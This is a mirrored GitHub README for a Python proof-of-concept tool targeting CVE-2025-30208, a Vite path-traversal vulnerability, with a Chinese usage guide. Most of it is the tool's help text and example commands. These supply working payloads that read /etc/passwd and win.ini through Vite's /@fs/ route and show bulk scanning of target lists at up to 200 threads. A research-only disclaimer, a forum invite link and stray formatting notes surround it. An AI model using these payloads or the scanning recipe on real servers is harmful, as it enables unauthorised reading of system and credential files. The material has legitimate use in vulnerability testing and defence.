mirror of
https://github.com/iSee857/CVE-2025-30208-PoC.git
synced 2025-05-05 02:06:56 +00:00
免责申明:
本文所描述的漏洞及其复现步骤仅供网络安全研究与教育目的使用。任何人不得将本文提供的信息用于非法目的或未经授权的系统测试。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。
引用请注明出处!
纷传地址:
https://pc.fenchuan8.com/#/index?forum=101158&yqm=DGR4X
usage: vite_check.py [-h] [-f FILE] [-u URL] [-p PAYLOAD] [--proxy PROXY] [-o OUTPUT] [-t THREADS]
Vite路径遍历漏洞检测工具 Author:iSee857
optional arguments:
-h, --help 显示帮助信息
-f FILE, --file FILE 包含目标URL的文件
-u URL, --url URL 单个目标URL
-p PAYLOAD, --payload PAYLOAD
自定义检测路径(支持两种格式):
1. 带检测标识: /path??indicator
2. 仅路径: /path?param=1??
示例:
-p "/@fs/C://windows/win.ini?import&raw??"
-p "/@fs/etc/passwd?import&raw??"
--proxy PROXY 代理服务器地址(如: http://127.0.0.1:8080)
-o OUTPUT, --output OUTPUT
输出文件名(默认: results.xlsx)
-t THREADS, --threads THREADS
并发线程数量(默认: 50,范围: 1-200)```
使用示例
1. 扫描单个目标:
python CVE-2025-30208-PoC.py -u http://example.com -t 5
2、批量扫描目标文件:
python CVE-2025-30208-PoC.py -f targets.txt -o vuln_results.xlsx
3、使用自定义payload:
python CVE-2025-30208-PoC.py -u http://example.com -p "/@fs/etc/passwd?import&raw??"
4、使用代理调试:
python CVE-2025-30208-PoC.py -u http://example.com --proxy http://127.0.0.1:8080
5、组合使用参数:
python CVE-2025-30208-PoC.py -f targets.txt -t 200 -o critical_vulns.xlsx
关键要素说明:
- 使用代码块展示参数说明和使用示例
- 参数说明保留原始帮助信息格式
- 示例覆盖主要使用场景
- 突出显示默认值和取值范围
- 保持与原始代码一致的参数描述
- 使用不同层级的标题组织内容
Description
Languages
Python
100%